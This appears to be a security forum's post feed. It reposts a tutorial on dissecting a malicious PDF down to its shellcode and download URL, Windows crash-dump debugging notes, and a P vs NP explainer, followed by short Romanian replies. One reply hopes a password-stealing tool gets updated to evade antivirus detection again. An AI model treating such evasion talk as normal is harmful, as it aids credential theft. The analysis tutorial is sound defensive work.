tool it can show very useful information about the PDF structure, its contents and even detect which vulnerability it triggers in case it has a signature for it. 2nd Step – Deobfuscate Javascript The second step is to deobfuscate the JavaScript. JavaScript can contain several layers of obfuscation. in this case there was quite some manual cleanup in the extracted code just to get the code isolated. The object.raw contained 4 JavaScript elements between <script xxxx contentType=”application/x-javascript”> tags and 1 image in base64 format in <image> tag. This JavaScript code between tags needs to be extracted and place into a separated file. The same can be done for the chunk of base64 data, when decoded will produce a 67Mb BMP file. The JavaScript in this case was rather cryptic but there are tools and techniques that help do the job in order to interpret and execute the code. In this case I used another tool called js-didier.pl which is a Didier version of the JavaScript interpreter SpiderMonkey. It is essentially a JavaScript interpreter without the browser plugins that you can run from the command line. This allows to run and analyze malicious JavaScript in a safe and controlled manner. The js-didier tool, just like SpiderMonkey, will execute the code and prints the result into files named eval.00x.log. I got some errors on one of the variables due to the manual cleanup but was enough to produce several eval log files with interesting results. 3rd Step – Extract the shellcode The third step is to extract the shellcode from the deobfuscated JavaScript. In this case the eval.005.log file contained the deobfuscated JavaScript. The file among other things contains 2 variables encoded as Unicode strings. This is one trick used to hide or obfuscate shellcode. Typically you find shellcode in JavaScript encoded in this way. These Unicode encoded strings need to be converted into binary. To perform this isolate the Unicode encoded strings into a separated file and convert it the Unicode (\u) to hex (\x) notation. To do this you need using a series of Perl regular expressions using a Remnux script called unicode2hex-escaped. The resulting file will contain the shellcode in a hex format (“\xeb\x06\x00\x00..”) that will be used in the next step to convert it into a binary 4th Step – Create a shellcode executable Next with the shellcode encoded in hexadecimal format we can produce a Windows binary that runs the shellcode. This is achieved using a script called shellcode2exe.py written by Mario Vilas and later tweaked by Anand Sastry. As Lenny states ” The shellcode2exe.py script accepts shellcode encoded as a string or as raw binary data, and produces an executable that can run that shellcode. You load the resulting executable file into a debugger to examine its. This approach is useful for analyzing shellcode that’s difficult to understand without stepping through it with a debugger.” 5th Step – Analyze shellcode and determine what is does. Final step is to determine what the shellcode does. To analyze the shellcode you could use a dissasembler or a debugger. In this case the a static analysis of the shellcode using the strings command shows several API calls used by the shellcode. Further also shows a URL pointing to an executable that will be downloaded if this shellcode gets executed We now have a strong IOC that can be used to take additional steps in order to hunt for evil and defend the networks. This URL can be used as evidence and to identify if machines have been compromised and attempted to download the malicious executable. At the time of this analysis the file was no longer there but its known to be a variant of the Game Over Zeus malware. The steps followed are manual but with practice they are repeatable. They just represent a short introduction to the multifaceted world of analyzing malicious documents. Many other techniques and tools exist and much deeper analysis can be done. The focus was to demonstrate the 5 Steps that can be used as a framework to discover indicators of compromise that will reveal machines that have been compromised by the same bad guys. However using these 5 steps many other questions could be answered. Using the mentioned and other tools and techniques within the 5 steps we can have a better practical understanding on how malicious documents work and which methods are used by Evi. Two great resource for this type of analysis is the Malware Analyst’s Cookbook : Tools and Techniques for Fighting Malicious Code book from Michael Ligh and the SANS FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Technique. Source
  19. The CR2 register being to be pointing to the referenced address within Arg 1. We can investigate further and gather some small but important clues by gathering a stack trace and then viewing the registers stored within a context switch upon a page fault.his is the first time I've debugged in a while, and the example is from a dump file which my friend on Sysnative Patrick has been debugging, but I wanted to write another debugging post which explained a few additional clues you can check with Stop 0x50's. The problem which I find with some bugchecks, is that their names can be a little generic and not really pinpoint the exact problem. Yes, they give a idea of the problem but do not give any major clues; a paged pool address could have been referenced at the wrong IRQL Level which would likely lead to a Stop 0x50 or a Stop 0xA. Let's take a look at few of the little clues available within the dump file. Within the description there is two clues which point to the type of possible problem. A invalid system address was being referenced, which is quite obvious, since it must have been a Kernel-Mode address otherwise we wouldn't have gotten the bugcheck and the address has been freed. Of course, the address could have been paged out onto a page file, and then the corruptions within the file system may have lead to that address being corrupted too. Now, a good thing next would be to check the CR2 and this if that matches the address being referenced within Arg 1. The CR2 register or Control Register 2, is the register which contains the Page Fault Linear Address or the last address which the program attempted to access. Linear Address is pretty much the Virtual Address or the Logical Address with the segment register added, which in this case is DS (Data Segment). The CR2 register being to be pointing to the referenced address within Arg 1. We can investigate further and gather some small but important clues by gathering a stack trace and then viewing the registers stored within a context switch upon a page fault. Using the .trap command on the trap frame address, we can view the registers and referenced addresses and the last called function which caused the page fault. Note a trap frame is the saving of a register state when an exception occurs, which is what a page fault is technically considered, it would only lead to problems if the exception couldn't be handled by the page fault handler within MmAccessFault. The concatenation of the two registers provides the address within the ds register and the referenced address within CR2 and Arg 1 of the bugcheck description. We have found the referenced address. Going back to the bugcheck description, notice "pointing to freed memory", the memory address has been freed wrongly with the nt!ExFreePoolWithTag function and paged out back onto the disk when it shouldn't have since this a non-paged pool memory address. We can even check the IRQL Level with the !irql extension, and see if the problem could have been due to IRQL Level problems, since only non-paged pool can be accessed and any page faults are illegal. Since the IRQL Level was 0, then the possibility of the IRQL Level is moot as page faults are legal. Source link
  20. This is going to be a short description of the difference between P and NP time complexity classes, and what the time complexity classes are based upon. These are used for Computational Complexity and Algorithm Analysis. Computability Theory is mainly concerned with what is computable, rather than how feasible that computation is. The P and NP time complexity classes are commonly based upon Deterministic and Non-Deterministic Turing Machines. These machines use similar mathematical notation to other models of computation, but are slightly more complex and have a larger application to other areas of Computer Science, and that is one of the reasons why I prefer to look at Turing Machines rather than Finite-State Automata. The P complexity class is a class of decision problems (Yes or No on some input), which are solvable within Polynomial Time on a Deterministic Turing Machine. It is given by P(n) or just P, where is the number of inputs. On the other hand, NP is the complexity class of decision problems which are solvable within Polynomial Time but on a Non-Deterministic Turing Machine, and therefore given by the NP(n) or simply NP notation. In general terms, it is considered that P is a feasible complexity class for decision problems. With both classes, the running time of the algorithm is said to increase polynomially as the size of input increases. The Y-Axis is Time, and the X-Axis is the Input Size. NP-Completeness and NP-Hard Given a decision problem A and another problem B, the decision problem A is considered NP-Hard, if for every B which belongs to NP, and B is reducible to A. If A is NP-Hard and and belongs to NP, then A is considered to be NP-Complete. NP-Complete algorithms infer that there is no P version of that such algorithm. They may also be considered the hardest problems within NP. Source: link
  21. This is a very simple error, and be can useful in providing a hint at which point the crash may have occurred. This has been explained by Scott Noone on this blog, but I wanted to write my own blog post about it and provide the data structure which he didn't mention. The error was found by Patrick in a Stop 0x101 bugcheck, and perfectly matches the context of the crash. Looking at Parameter 4, we can see the Processor Index Number which has become hung. This is where the error message is located too. Using the !process extension on the same Processor Number Index, we can check the DirBase field to find the mismatch within the two address indicated in the error message. The DirBase is a physical address of the Process Directory Table Base. The DirBase field is the field within structure formatted with !process, which contains the address of the Process Directory Table Base for the current process, and thus if the two addresses don't match, then WinDbg will produce that error string. It tends to be caused when a crash occurs during a context switch. You can find the same field under the _KPROCESS data structure: *The Process Directory Table Base is private to each Process Address Space and is used with conjunction to the TLB Cache and TLB Flushing. It's all the virtual address pages which correspond to that process, and thus when a Context Switch occurs, then the Control Register can be changed to the address of the process and all the entries within the TLB Cache are flushed. Afterwards, when the new addresses have been loaded, each page translation will result in a complete page walk until all the TLB Cache Entries have been rebuilt. This is a expensive process, and thus some processor architectures will tag entries corresponding to certain processes, and then only flush the corresponding tags. Source: link
  22. trafic.ro t5.ro @Terry.Crews mai multe gasesti aici: https://www.google.co.uk/search?q=statistici+trafic+web+site&oq=statistici+trafic+web+site&gs=&gws_rd=ssl
  23. @LuckyLUciano acum ca si-a pierdut FUD-ul datorita unui geniu ce a scanat pe virustotal e detectat de antivirusi ( deoarece e un program rau intentionat, nu pentru tine dar cu el poti ,,fura parole" asa ca iti dai si tu seama de ce e detectat...) Asteapta ca byte-ul sa faca update poate il face iar FUD si sa speram ca nu se va mai pierde.
  24. stai linistit ca nici nu o sa ajungi )
  25. Vreau si eu extensia te rog multam.
×
×
  • Create New...